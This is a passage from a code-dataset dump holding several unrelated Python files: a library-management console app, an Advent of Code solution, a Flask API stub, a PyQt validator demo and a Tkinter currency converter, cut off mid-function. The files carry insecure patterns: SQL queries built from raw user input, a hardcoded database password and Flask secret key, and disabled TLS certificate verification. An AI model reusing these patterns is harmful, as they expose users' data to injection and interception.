print(\"请输入你想查找的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该书编号\")\r\n else:\r\n sql = \"SELECT * FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n print(\"图书查询成功\")\r\n os.system(\"pause\")\r\n\r\ndef borrowsearch(): # 查询借阅界面\r\n os.system(\"cls\")\r\n print(\"===查询借阅===\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT * FROM borrow WHERE rid='\" + uniqueid + \"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\nfirst()\r\n#system(\"color DF\")\t改变屏幕背景颜色和文字颜色\r\n#0黑 1蓝 2绿 3湖蓝 4红 5紫 6黄 7白 8灰 9淡蓝 A淡绿 B淡浅绿 C淡红 D淡紫 E淡黄 F亮白\r\nos.system(\"color F0\")\r\nwhile True:\r\n os.system(\"cls\")\r\n print(\"===图书管理系统===\")\r\n print(\"1、管理员登录\")\r\n print(\"2、读者登录\")\r\n print(\"0、退出系统\")\r\n ch=input(\"请选择操作:\")\r\n if ch=='1':\r\n adminlogin()\r\n elif ch=='2':\r\n readerlogin()\r\n elif ch=='0':\r\n exit()\r\n#os.system(\"pause\")","repo_name":"Stargazer1949/Python","sub_path":"图书管理系统/图书管理系统.py","file_name":"图书管理系统.py","file_ext":"py","file_size_in_byte":18876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24658650958","text":"import itertools\nwith open(\"C:\\\\Advent\\\\day14.txt\", \"r\") as file:\n data = [x.strip() for x in file.read().splitlines()]\n mem, mem_p2 = {}, {}\n for x in data:\n if x.startswith('mask'):\n mask = x.split(' = ')[1]\n else:\n index = int(x.split('[')[1].split(']')[0])\n intval = int(x.split(' = ')[1])\n binaryval = (36-len(format(intval, 'b')))*'0'+format(intval, 'b')\n vals = [v for v in binaryval]\n for e in [i for i in range(len(mask)) if mask[i] != 'X']:\n vals[e] = mask[e]\n mem[index] = int(''.join(vals), 2)\n binaryindex = (36-len(format(index, 'b')))*'0'+format(index, 'b')\n index_vals = [v for v in binaryindex]\n for e in [i for i in range(len(mask)) if mask[i] != '0']:\n index_vals[e] = mask[e]\n x_indexes = [i for i in range(len(mask)) if mask[i] == 'X']\n options = list(itertools.product(['1','0'], repeat=len(x_indexes)))\n for e in range(len(options)):\n for i in range(len(options[e])):\n index_vals[x_indexes[i]] = options[e][i]\n mem_p2[int(''.join(index_vals), 2)] = intval \n print('Part 1: {}'.format(reduce(lambda x,y: x+y, [z for z in mem.values()])))\n print('Part 2: {}'.format(reduce(lambda x,y: x+y, [z for z in mem_p2.values()])))\n","repo_name":"Diderikdm/Advent-of-Code-2020","sub_path":"day 14 - part 1 & 2.py","file_name":"day 14 - part 1 & 2.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38525702998","text":"import os\nfrom flask import Flask, jsonify\n\nfrom api.read import read_blueprint\nfrom api.info import info_blueprint\nfrom api.create import create_blueprint\nfrom api.update import update_blueprint\nfrom api.auth import auth_blueprint\nfrom api.delete import delete_blueprint\n\napp = Flask(__name__)\napp.register_blueprint(read_blueprint)\napp.register_blueprint(info_blueprint)\napp.register_blueprint(create_blueprint)\napp.register_blueprint(update_blueprint)\napp.register_blueprint(auth_blueprint)\napp.register_blueprint(delete_blueprint)\n\napp.secret_key = \"secret\"\n\n\n@app.route('/')\n@app.route('/docs')\n@app.route('/doc')\ndef index():\n return \"\"\"\n

This is testing example API

\n Available routes:
\n Инфоблок о запросах
\n Documentation Документация
\n Create Создаение данных
\n Read Чтение данных
\n Info Информация по запросу
\n Update Изменение и добавление данных
\n Auth Авторизация
\n \"\"\"\n\n\n@app.errorhandler(405)\ndef page_not_found(e):\n return jsonify({\"status\": \"error\", \"description\": \"method_not_allowed\"})\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=os.getenv(\"PORT\", 5000))\n","repo_name":"pavlovprojects/api_example","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"456376460","text":"from PyQt5.Qt import QApplication, QMainWindow\nfrom PyQt5.QtGui import QIntValidator, QValidator\nfrom PyQt5.QtWidgets import QWidget, QLineEdit, QPushButton, QVBoxLayout\nimport sys\n\n\n#https://doc.qt.io/qt-5/qvalidator.html\n#https://doc.qt.io/qt-5/qintvalidator.html\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.layout = QVBoxLayout()\n self.le1 = QLineEdit()\n self.b1 = QPushButton(\"Validate\")\n self.le1.setPlaceholderText(\"value between 10 and 50\")\n\n self.layout.addWidget(self.le1)\n self.layout.addWidget(self.b1)\n\n self.w = QWidget()\n self.w.setLayout(self.layout)\n self.setCentralWidget(self.w)\n self.show()\n\n # Accepts input values from 1 to 99999, but Acceptable is from 1 to 10000\n self.int_validator = QIntValidator(1, 10000, self.le1)\n\n # Set restricted range from 10 to 50 - Accepts input values from 1 to 99, but accetable is from 10 to 50\n self.int_validator.setRange(10, 50)\n\n self.le1.setValidator(self.int_validator)\n\n # Should not be called if the value is not valid\n self.le1.editingFinished.connect(self.isValid)\n # Should not be called if the value is not valid\n self.le1.returnPressed.connect(self.isValid)\n self.b1.pressed.connect(self.isValid)\n\n def isValid(self):\n\n valid, _text, _npos = QIntValidator.validate(\n self.int_validator, self.le1.text(), self.le1.cursorPosition())\n\n if valid == QValidator.Acceptable:\n print(\"Valid \" + self.le1.text())\n\n elif valid == QValidator.Intermediate:\n print(\"Close, but not valid\")\n\n elif valid == QValidator.Invalid:\n print(\"This is clearly not valid\")\n\n\napp = QApplication(sys.argv)\nwindow = MainWindow()\napp.exec_()\n","repo_name":"ThomasOdegard/PyQt_snippets","sub_path":"QValidator.py","file_name":"QValidator.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"46628784710","text":"from tkinter import * #GUI\nimport time\nfrom PIL import Image, ImageTk #To import cover photo --> pip/pillow\nimport ssl\nimport urllib.request as ur\nimport re\nimport json\n\nroot = Tk()\n\nclass mainWindow(Frame): #Display main window\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n self.init_window()\n\n def init_window(self):\n self.master.title(\"Brownies Converters\") #Window title\n self.pack(fill=BOTH, expand=1)\n\n self.Img()\n root.after(6300, self.Buttons)\n \n def Buttons(self):\n startButton = Button(self, text=\"Start\", command = self.start)\n startButton.place(x=295,y=400)\n\n quitbutton = Button(self, text=\"Quit Application\", command=self.app_exit)\n quitbutton.place(x=260, y=450)\n\n def Img(self): #Loading Screen\n load = Image.open(\"Logo_2.gif\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img2)\n def Img2(self):\n load = Image.open(\"Logo_2-2.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img3)\n def Img3(self):\n load = Image.open(\"Logo_2-3.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img4)\n def Img4(self):\n load = Image.open(\"Logo_2-4.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img5)\n def Img5(self):\n load = Image.open(\"Logo_2-5.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img6)\n def Img6(self):\n load = Image.open(\"Logo_2-6.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img7)\n def Img7(self):\n load = Image.open(\"Logo_2-7.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img8)\n def Img8(self):\n load = Image.open(\"Logo_2-8.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img9)\n def Img9(self):\n load = Image.open(\"Logo_2-9.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n \n def intro(self):\n intro1 = Label(root, text = \"Welcome to Currency Converter, prsented by Brownies converters!\")\n intro1.place(x=10, y=0)\n intro2 = Label(root, text = \"Currencies are updated everyday at 3:00 PM\")\n intro2.place(x=10, y=30)\n intro3 = Label(root, text = \"Click proceed or Enter/Return to continue\")\n intro3.place(x=10, y=60)\n e = Label(root, text=\" \")\n intro1.place(x=10, y=90)\n \n def start(self):\n load = Image.open(\"bg.jpg\") #Replace cover photo with background for\n photo = ImageTk.PhotoImage(load) #aesthetics\n\n img = Label(self, image=photo)\n img.image = photo\n img.pack() \n \n self.intro()\n global conget\n global toget\n\n OPTIONS = [\"---\", \"CAD\", \"USD\", \"EUR\", \"INR\", \"JPY\", \"BRL\", \"GBP\"]\n conget = StringVar(root)\n conget.set(OPTIONS[0])\n OPTIONS2 = [\"---\", \"CAD\", \"USD\", \"EUR\", \"INR\", \"JPY\", \"BRL\", \"GBP\"]\n toget = StringVar(root)\n toget.set(OPTIONS[0])\n \n con = Label(root, text=\"What currency do you want to convert from: \")\n con.place(x=50, y=145)\n var = OptionMenu(root, conget, *OPTIONS)\n var.place(x=370, y=145)\n\n to = Label(root, text=\"What currency do you want to convert to: \")\n to.place(x=50, y=185)\n var2 = OptionMenu(root, toget, *OPTIONS2)\n var2.place(x=370, y=185)\n\n convertButton = Button(self, text=\"Proceed\", command=self.convert)\n convertButton.place(x=268, y=450)\n root.bind(\"\", self.convertLink)\n def convertLink(self, event=None):\n self.convert()\n def convert(self): #Loads conversion for user\n conget.get()\n toget.get()\n\n if conget.get() == \"CAD\" and toget.get() == \"USD\":\n self.CAD_to_USD()\n elif conget.get() == \"CAD\" and toget.get() == \"EUR\":\n self.CAD_to_EUR()\n elif conget.get() == \"CAD\" and toget.get() == \"INR\":\n self.CAD_to_INR()\n elif conget.get() == \"CAD\" and toget.get() == \"JPY\":\n self.CAD_to_JPY()\n elif conget.get() == \"CAD\" and toget.get() == \"BRL\":\n self.CAD_to_BRL()\n elif conget.get() == \"CAD\" and toget.get() == \"GBP\":\n self.CAD_to_GBP()\n \n elif conget.get() == \"USD\" and toget.get() == \"CAD\":\n self.USD_to_CAD()\n elif conget.get() == \"USD\" and toget.get() == \"EUR\":\n self.USD_to_EUR()\n elif conget.get() == \"USD\" and toget.get() == \"INR\":\n self.USD_to_INR()\n elif conget.get() == \"USD\" and toget.get() == \"JPY\":\n self.USD_to_JPY()\n elif conget.get() == \"USD\" and toget.get() == \"BRL\":\n self.USD_to_BRL()\n elif conget.get() == \"USD\" and toget.get() == \"GBP\":\n self.USD_to_GBP()\n \n elif conget.get() == \"EUR\" and toget.get() == \"CAD\":\n self.EUR_to_CAD()\n elif conget.get() == \"EUR\" and toget.get() == \"USD\":\n self.EUR_to_USD()\n elif conget.get() == \"EUR\" and toget.get() == \"INR\":\n self.EUR_to_INR()\n elif conget.get() == \"EUR\" and toget.get() == \"JPY\":\n self.EUR_to_JPY()\n elif conget.get() == \"EUR\" and toget.get() == \"BRL\":\n self.EUR_to_BRL()\n elif conget.get() == \"EUR\" and toget.get() == \"GBP\":\n self.EUR_to_GBP()\n\n elif conget.get() == \"INR\" and toget.get() == \"CAD\":\n self.INR_to_CAD()\n elif conget.get() == \"INR\" and toget.get() == \"USD\":\n self.INR_to_USD()\n elif conget.get() == \"INR\" and toget.get() == \"EUR\":\n self.INR_to_EUR()\n elif conget.get() == \"INR\" and toget.get() == \"JPY\":\n self.INR_to_JPY()\n elif conget.get() == \"INR\" and toget.get() == \"BRL\":\n self.INR_to_BRL()\n elif conget.get() == \"INR\" and toget.get() == \"GBP\":\n self.INR_to_GBP()\n \n elif conget.get() == \"JPY\" and toget.get() == \"CAD\":\n self.JPY_to_CAD()\n elif conget.get() == \"JPY\" and toget.get() == \"USD\":\n self.JPY_to_USD()\n elif conget.get() == \"JPY\" and toget.get() == \"EUR\":\n self.JPY_to_EUR()\n elif conget.get() == \"JPY\" and toget.get() == \"INR\":\n self.JPY_to_INR()\n elif conget.get() == \"JPY\" and toget.get() == \"BRL\":\n self.JPY_to_BRL()\n elif conget.get() == \"JPY\" and toget.get() == \"GBP\":\n self.JPY_to_GBP()\n \n elif conget.get() == \"BRL\" and toget.get() == \"CAD\":\n self.BRL_to_CAD()\n elif conget.get() == \"BRL\" and toget.get() == \"USD\":\n self.BRL_to_USD()\n elif conget.get() == \"BRL\" and toget.get() == \"EUR\":\n self.BRL_to_EUR()\n elif conget.get() == \"BRL\" and toget.get() == \"INR\":\n self.BRL_to_INR()\n elif conget.get() == \"BRL\" and toget.get() == \"JPY\":\n self.BRL_to_JPY()\n elif conget.get() == \"BRL\" and toget.get() == \"GBP\":\n self.BRL_to_GBP()\n\n elif conget.get() == \"GBP\" and toget.get() == \"CAD\":\n self.GBP_to_CAD()\n elif conget.get() == \"GBP\" and toget.get() == \"USD\":\n self.GBP_to_USD()\n elif conget.get() == \"GBP\" and toget.get() == \"EUR\":\n self.GBP_to_EUR()\n elif conget.get() == \"GBP\" and toget.get() == \"INR\":\n self.GBP_to_INR()\n elif conget.get() == \"GBP\" and toget.get() == \"JPY\":\n self.GBP_to_JPY()\n elif conget.get() == \"GBP\" and toget.get() == \"BRL\":\n self.GBP_to_BRL()\n \n elif conget.get() == \"---\" and toget.get() == \"---\":\n global pls\n pls = Label(self, text=\"Please choose currencies\")\n pls.place(x=227, y=370)\n root.after(750, self.plsDestroy)\n else:\n error = Label(self, text=\"Sorry, Not Supported\")\n error.place(x=240, y=370)\n def plsDestroy(self):\n pls.destroy()\n def again(self): #convert again or not\n global ag\n again = Label(root, text=\"Would you like to convert again?\")\n again.place(x=90, y=300)\n agButton = Button(self, text=\"Yes\", command=self.ting)\n agButton.place(x=400, y=300)\n agButton2 = Button(self, text=\"No\", command=self.endingTitle)\n agButton2.place(x=460, y=300)\n def ting(self):\n self.pack_forget()\n app=mainWindow(root)\n \n def CAD_to_USD(self): #Conversion rates \n global user_value\n user_ask = Label(root, text =\"How many Canadian dollars? \")\n user_ask.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value.place(x=370, y=225)\n\n calcButton = Button(self, text=\" Convert \", command=self.cal)\n calcButton.place(x=265, y=450)\n root.bind(\"\", self.linkCal)\n def linkCal(self, event=None):\n self.cal()\n def cal(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val= float(user_value.get()) * (usd_rate)\n int(val)\n\n x = Label(root, text=\"USD: \")\n x.place(x=250, y=265)\n out = Label(root)\n out.config(text = '{:0.2f}'.format(val))\n out.place(x=380, y=265)\n self.again()\n\n def CAD_to_EUR(self):\n global user_value2\n user_ask2 = Label(root, text =\"How many Canadian dollars? \")\n user_ask2.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value2 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value2.place(x=370, y=225)\n\n calcButton2 = Button(self, text=\" Convert \", command=self.cal2)\n calcButton2.place(x=265, y=450)\n root.bind(\"\", self.linkCal2)\n def linkCal2(self, event=None):\n self.cal2()\n def cal2(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val2= float(user_value2.get()) * (eur_rate)\n int(val2)\n\n x2 = Label(root, text=\"EUR: \")\n x2.place(x=250, y=265)\n out2 = Label(root)\n out2.config(text = '{:0.2f}'.format(val2))\n out2.place(x=380, y=265)\n\n self.again()\n\n def CAD_to_INR(self):\n global user_value6\n user_ask6 = Label(root, text =\"How many Canadian dollars? \")\n user_ask6.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value6 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value6.place(x=370, y=225)\n\n calcButton6 = Button(self, text=\" Convert \", command=self.cal6)\n calcButton6.place(x=265, y=450)\n root.bind(\"\", self.linkCal6)\n def linkCal6(self, event=None):\n self.cal6()\n def cal6(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val6= float(user_value6.get()) * (inr_rate)\n int(val6)\n\n x6 = Label(root, text=\"INR: \")\n x6.place(x=250, y=265)\n out6 = Label(root)\n out6.config(text = '{:0.2f}'.format(val6))\n out6.place(x=380, y=265)\n\n self.again()\n\n def CAD_to_JPY(self):\n global user_value12\n user_ask12 = Label(root, text =\"How many Canadian dollars? \")\n user_ask12.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value12 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value12.place(x=370, y=225)\n\n calcButton12 = Button(self, text=\" Convert \", command=self.cal12)\n calcButton12.place(x=265, y=450)\n root.bind(\"\", self.linkCal12)\n def linkCal12(self, event=None):\n self.cal12()\n def cal12(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val12= float(user_value12.get()) * (jpy_rate)\n int(val12)\n\n x12 = Label(root, text=\"JPY: \")\n x12.place(x=250, y=265)\n out12 = Label(root)\n out12.config(text = '{:0.2f}'.format(val12))\n out12.place(x=380, y=265)\n\n self.again()\n\n def CAD_to_BRL(self):\n global user_value20\n user_ask20 = Label(root, text =\"How many Canadian dollars? \")\n user_ask20.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value20 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value20.place(x=370, y=225)\n\n calcButton20 = Button(self, text=\" Convert \", command=self.cal20)\n calcButton20.place(x=265, y=450)\n root.bind(\"\", self.linkCal20)\n def linkCal20(self, event=None):\n self.cal20()\n def cal20(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val20= float(user_value20.get()) * (brl_rate)\n int(val20)\n\n x20 = Label(root, text=\"BRL: \")\n x20.place(x=250, y=265)\n out20 = Label(root)\n out20.config(text = '{:0.2f}'.format(val20))\n out20.place(x=380, y=265)\n\n self.again()\n\n def CAD_to_GBP(self):\n global user_value29\n user_ask29 = Label(root, text =\"How many Canadian dollars? \")\n user_ask29.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value29 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value29.place(x=370, y=225)\n\n calcButton29 = Button(self, text=\" Convert \", command=self.cal29)\n calcButton29.place(x=265, y=450)\n root.bind(\"\", self.linkCal29)\n def linkCal29(self, event=None):\n self.cal29()\n def cal29(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val29= float(user_value29.get()) * (gbp_rate)\n int(val29)\n\n x29 = Label(root, text=\"GBP: \")\n x29.place(x=250, y=265)\n out29 = Label(root)\n out29.config(text = '{:0.2f}'.format(val29))\n out29.place(x=380, y=265)\n\n self.again()\n\n \n def USD_to_CAD(self):\n global user_value1\n user_ask1 = Label(root, text =\"How many US dollars? \")\n user_ask1.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value1 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value1.place(x=370, y=225)\n\n calcButton1 = Button(self, text=\" Convert \", command=self.cal1)\n calcButton1.place(x=265, y=450)\n root.bind(\"\", self.linkCal1)\n def linkCal1(self, event=None):\n self.cal1()\n def cal1(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val1= float(user_value1.get()) * (cad_rate)\n int(val1)\n\n x1 = Label(root, text=\"CAD: \")\n x1.place(x=250, y=265)\n out1 = Label(root)\n out1.config(text = '{:0.2f}'.format(val1))\n out1.place(x=380, y=265)\n\n self.again()\n \n def USD_to_EUR(self):\n global user_value4\n user_ask4 = Label(root, text =\"How many US Dollars? \")\n user_ask4.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value4 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value4.place(x=370, y=225)\n\n calcButton4 = Button(self, text=\" Convert \", command=self.cal4)\n calcButton4.place(x=265, y=450)\n root.bind(\"\", self.linkCal4)\n def linkCal4(self, event=None):\n self.cal4()\n def cal4(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val4= float(user_value4.get()) * (eur_rate)\n int(val4)\n\n x4 = Label(root, text=\"EUR: \")\n x4.place(x=250, y=265)\n out4 = Label(root)\n out4.config(text = '{:0.2f}'.format(val4))\n out4.place(x=380, y=265)\n\n self.again()\n \n def USD_to_INR(self):\n global user_value8\n user_ask8 = Label(root, text =\"How many US Dollars? \")\n user_ask8.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value8 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value8.place(x=370, y=225)\n\n calcButton8 = Button(self, text=\" Convert \", command=self.cal8)\n calcButton8.place(x=265, y=450)\n root.bind(\"\", self.linkCal8)\n def linkCal8(self, event=None):\n self.cal8()\n def cal8(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val8= float(user_value8.get()) * (inr_rate)\n int(val8)\n\n x8 = Label(root, text=\"INR: \")\n x8.place(x=250, y=265)\n out8 = Label(root)\n out8.config(text = '{:0.2f}'.format(val8))\n out8.place(x=380, y=265)\n\n self.again()\n\n def USD_to_JPY(self):\n global user_value13\n user_ask13 = Label(root, text =\"How many US Dollars? \")\n user_ask13.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value13 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value13.place(x=370, y=225)\n\n calcButton13 = Button(self, text=\" Convert \", command=self.cal13)\n calcButton13.place(x=265, y=450)\n root.bind(\"\", self.linkCal13)\n def linkCal13(self, event=None):\n self.cal13()\n def cal13(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val13= float(user_value13.get()) * (jpy_rate)\n int(val13)\n\n x13 = Label(root, text=\"JPY: \")\n x13.place(x=250, y=265)\n out13 = Label(root)\n out13.config(text = '{:0.2f}'.format(val13))\n out13.place(x=380, y=265)\n\n self.again()\n\n def USD_to_BRL(self):\n global user_value21\n user_ask21 = Label(root, text =\"How many US Dollars? \")\n user_ask21.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value21 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value21.place(x=370, y=225)\n\n calcButton21 = Button(self, text=\" Convert \", command=self.cal21)\n calcButton21.place(x=265, y=450)\n root.bind(\"\", self.linkCal21)\n def linkCal121(self, event=None):\n self.cal21()\n def cal21(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val21= float(user_value21.get()) * (brl_rate)\n int(val21)\n\n x21 = Label(root, text=\"BRL: \")\n x21.place(x=250, y=265)\n out21 = Label(root)\n out21.config(text = '{:0.2f}'.format(val21))\n out21.place(x=380, y=265)\n\n self.again()\n\n def USD_to_GBP(self):\n global user_value30\n user_ask30 = Label(root, text =\"How many US Dollars? \")\n user_ask30.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value30 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value30.place(x=370, y=225)\n\n calcButton30 = Button(self, text=\" Convert \", command=self.cal30)\n calcButton30.place(x=265, y=450)\n root.bind(\"\", self.linkCal30)\n def linkCal130(self, event=None):\n self.cal30()\n def cal30(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val30= float(user_value30.get()) * (gbp_rate)\n int(val30)\n\n x30 = Label(root, text=\"GBP: \")\n x30.place(x=250, y=265)\n out30 = Label(root)\n out30.config(text = '{:0.2f}'.format(val30))\n out30.place(x=380, y=265)\n\n self.again()\n \n\n def EUR_to_CAD(self):\n global user_value3\n user_ask3 = Label(root, text =\"How many Euros? \")\n user_ask3.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value3 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value3.place(x=370, y=225)\n\n calcButton3 = Button(self, text=\" Convert \", command=self.cal3)\n calcButton3.place(x=265, y=450)\n root.bind(\"\", self.linkCal3)\n def linkCal3(self, event=None):\n self.cal3()\n def cal3(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val3= float(user_value3.get()) * (cad_rate)\n int(val3)\n\n x3 = Label(root, text=\"CAD: \")\n x3.place(x=250, y=265)\n out3 = Label(root)\n out3.config(text = '{:0.2f}'.format(val3))\n out3.place(x=380, y=265)\n\n self.again()\n\n def EUR_to_USD(self):\n global user_value5\n user_ask5 = Label(root, text =\"How many Euros? \")\n user_ask5.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value5 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value5.place(x=370, y=225)\n\n calcButton5 = Button(self, text=\" Convert \", command=self.cal5)\n calcButton5.place(x=265, y=450)\n root.bind(\"\", self.linkCal5)\n def linkCal5(self, event=None):\n self.cal5()\n def cal5(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = 